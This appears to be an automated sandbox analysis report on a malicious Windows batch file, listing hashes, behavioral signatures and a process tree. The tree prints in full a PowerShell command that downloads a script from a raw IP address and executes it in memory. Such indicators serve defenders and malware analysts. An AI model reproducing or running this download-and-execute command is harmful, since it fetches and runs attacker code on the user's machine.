Analysis
-
max time kernel
123s -
max time network
142s -
platform
windows7_x64 -
resource
win7 -
submitted
02-09-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
cfc86f216b68d4b768a61dc8091a67ab.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
cfc86f216b68d4b768a61dc8091a67ab.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
cfc86f216b68d4b768a61dc8091a67ab.bat
-
Size
217B
-
MD5
89876aac9d3c6644f7ae3b4cf68d7a1e
-
SHA1
e37353d60d13106478fd94133ec1ae8b15e51062
-
SHA256
146be0d88aa964787807ec908e13f1eb124530caca22ad1c3d80c73761892e90
-
SHA512
8ea7a17a997a6b12f0acac1951fe0dc70c57221bd2204173597b951e7bf77b3f1f94a5ded81f074f51cb159d4ebe7bf7db1c207fd4febcfae1183788890ee503
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1040 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1040 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1040 powershell.exe 1040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1040 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1460 wrote to memory of 1040 1460 cmd.exe powershell.exe PID 1460 wrote to memory of 1040 1460 cmd.exe powershell.exe PID 1460 wrote to memory of 1040 1460 cmd.exe powershell.exe PID 1460 wrote to memory of 1040 1460 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\cfc86f216b68d4b768a61dc8091a67ab.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab');Invoke-ABXNAAYIVS;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1040